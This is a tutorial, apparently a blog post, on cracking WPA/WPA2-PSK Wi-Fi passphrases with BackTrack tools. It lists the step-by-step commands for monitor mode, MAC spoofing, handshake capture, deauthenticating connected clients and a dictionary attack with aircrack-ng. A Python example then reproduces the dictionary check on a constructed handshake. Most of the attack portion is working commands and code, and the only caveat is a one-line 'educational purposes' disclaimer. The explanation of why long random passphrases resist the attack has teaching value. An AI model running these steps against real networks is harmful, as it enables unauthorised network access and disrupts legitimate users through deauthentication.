BackTrack Tutorial – How to crack WPA
In this tutorial I show how to crack a wireless network secured with WPA-PSK (WPA with a pre-shared key). Although it may sound hard, it is actually easier than you might think, provided the network uses a weak passphrase that appears in your dictionary.
This information should only be used for educational purposes.
The WPA protocol implements the majority of the IEEE 802.11i standard. The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the completion of 802.11i. Specifically, the Temporal Key Integrity Protocol (TKIP) was brought into WPA. TKIP could be implemented through firmware upgrades on pre-WPA wireless network interface cards that began shipping as far back as 1999. Because the changes required fewer modifications on the client than on the wireless access points (APs), most pre-2003 APs could not be upgraded to support WPA with TKIP. Researchers have since discovered a flaw in TKIP that relies on older weaknesses to retrieve the keystream from short packets to use for re-injection and spoofing. Note that the attack in this tutorial does not use that TKIP flaw at all: it is a dictionary attack on the pre-shared key, it works exactly the same way against WPA2-PSK (CCMP/AES), and it succeeds only if the passphrase is in your dictionary.
Here are the commands:

To see your wireless card's interface name (wlan0, ath0, etc.), run airmon-ng with no arguments, or iwconfig.

airmon-ng stop [wireless card name]
ifconfig [wireless card name] down
macchanger --mac 00:11:22:33:44:55 [wireless card name]
airmon-ng start [wireless card name]
- airmon-ng stop ends any monitor-mode session the card is already in; the card is then brought down so macchanger can set a spoofed MAC address (00:11:22:33:44:55 is just an example; without this your real MAC appears in every frame you inject); airmon-ng start puts the card into monitor mode. On many BackTrack builds airmon-ng start creates a separate monitor interface (for example mon0, or ath0 on madwifi cards); if it does, use that interface name in the commands below instead of the card name.

airodump-ng [wireless card name]
- start sniffing; note the BSSID (MAC), channel and ESSID of the target network and which clients (STATION column) are associated with it, then press Ctrl+C to stop sniffing

airodump-ng -c (channel) -w [filename] --bssid (paste AP's MAC here) [wireless card name]
- lock onto the target's channel and write everything captured to filename-01.cap. Leave this running: it has to be listening when a client reconnects, and it shows "WPA handshake: (AP's MAC)" in the top right corner once the four-way handshake has been captured.

Open a new Konsole:
aireplay-ng -0 5 -a (paste AP's MAC here) [wireless card name]
- send 5 deauthentication frames to the AP's clients. A connected client is required: the deauth forces it to reassociate, and it is the resulting four-way handshake that airodump-ng captures, not the passphrase itself. Adding -c (client's MAC) deauthenticates one station instead of broadcasting, which is quieter and more reliable. Repeat until airodump-ng reports the handshake.

aircrack-ng -w (dictionary location) (filename-01.cap)
- if the capture contains several networks, add -b (paste AP's MAC here) to select the target
aircrack-ng does not pull the passphrase out of the capture directly; the capture only contains the four-way handshake. For every entry in our dictionary list it derives the Pairwise Master Key from that entry and our ESSID (PBKDF2-HMAC-SHA1 with 4096 iterations, which is why the cracking is slow and why the ESSID is needed), derives the session key from the PMK together with the two MAC addresses and the two nonces in the handshake, and checks whether the resulting MIC matches the one in the captured EAPOL-Key frame. A match means that entry is the passphrase; if the passphrase is not in the dictionary, the attack fails, which is why a long random passphrase is the real defence. Because the ESSID is the salt, tables precomputed for one network name do not apply to another.
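To make that last step concrete, here is an added example (not code from this tutorial or from aircrack-ng) that does in Python what aircrack-ng does with the capture produced by the commands above: derive the PMK from each dictionary word and the ESSID, expand it to the PTK with the handshake's MAC addresses and nonces, and compare the resulting MIC with the one in the captured EAPOL-Key message. Since no real capture can ship with the page, every handshake value (network name, MAC addresses, nonces, the message 2 frame, the passphrase and the wordlist) is constructed in the block and labelled as such; the message's MIC is computed with the same derivation, so the example demonstrates the check, not an attack on a real network.

```python
"""Added example (not the tutorial's or aircrack-ng's code): the dictionary
check aircrack-ng performs on a captured WPA/WPA2-PSK four-way handshake.
Every handshake value below is constructed for this example."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the 16-byte MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 iterations, 32 bytes).
    The ESSID is the salt: that is why aircrack-ng needs it and why a table
    precomputed for one network name is useless against another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 ||
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce) || i)
    for i = 0..3, concatenated and cut to 64 bytes. Bytes 0-15 are the KCK,
    the key that authenticates the EAPOL-Key messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(kck, frame_with_zeroed_mic, key_descriptor_version):
    """MIC over the whole EAPOL-Key frame with its MIC field set to zero.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP)
    uses HMAC-SHA1 truncated to 16 bytes."""
    if key_descriptor_version == 1:
        return hmac.new(kck, frame_with_zeroed_mic, hashlib.md5).digest()
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_eapol_key_frame(descriptor_type, key_info, key_length, nonce, mic=bytes(16)):
    """Minimal EAPOL-Key frame: 802.1X header, then the key descriptor fields."""
    body = struct.pack(">BHH", descriptor_type, key_info, key_length)
    body += bytes(8)              # replay counter
    body += nonce                 # 32-byte key nonce
    body += bytes(16)             # key IV
    body += bytes(8)              # key RSC
    body += bytes(8)              # key ID (reserved)
    body += mic                   # 16-byte key MIC
    body += struct.pack(">H", 0)  # key data length (no key data in this example)
    return struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X version 1, type 3 = EAPOL-Key


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Return the wordlist entry whose derived KCK reproduces the MIC in msg2
    (the station's handshake message carrying SNonce), or None if no entry does."""
    version = struct.unpack(">H", msg2[5:7])[0] & 0x7  # low 3 bits of Key Information
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA-PSK passphrases are 8-63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), captured_mic):
            return candidate
    return None


# --- constructed handshake, standing in for the airodump-ng capture ---
SSID = "BackTrackLab"                    # constructed ESSID
AP_MAC = bytes.fromhex("00aabbccddee")   # constructed BSSID
STA_MAC = bytes.fromhex("001122334455")  # the spoofed client MAC used in the tutorial
ANONCE = bytes(range(32))                # constructed AP nonce
SNONCE = bytes(range(32, 64))            # constructed station nonce
PASSPHRASE = "letmein1234"               # constructed weak pre-shared key
WORDLIST = ["password", "12345678", "letmein", "letmein1234", "qwertyuiop"]  # constructed dictionary


def make_message2(passphrase):
    """Simulate message 2 of the handshake as the station sends it:
    SNonce plus a MIC under the KCK derived from the real passphrase."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    # WPA descriptor type 0xFE, Key Information 0x0109 = pairwise + MIC + version 1, TKIP key length 32
    unsigned = build_eapol_key_frame(0xFE, 0x0109, 32, SNONCE)
    mic = eapol_mic(kck, unsigned, 1)
    return unsigned[:MIC_OFFSET] + mic + unsigned[MIC_OFFSET + 16:]


MSG2 = make_message2(PASSPHRASE)

if __name__ == "__main__":
    print("KEY FOUND:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, MSG2, WORDLIST))
```

Running it reports letmein1234. Passing a different SSID to crack_handshake returns None even though the same word is in the list, which is the ESSID-as-salt point above, and letmein is skipped without being hashed because a WPA-PSK passphrase is 8 to 63 characters. The 4096-iteration PBKDF2 step is where aircrack-ng spends almost all of its time, so dictionary size, not the handshake, decides how long the attack takes.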
If you have questions please ask in the comments!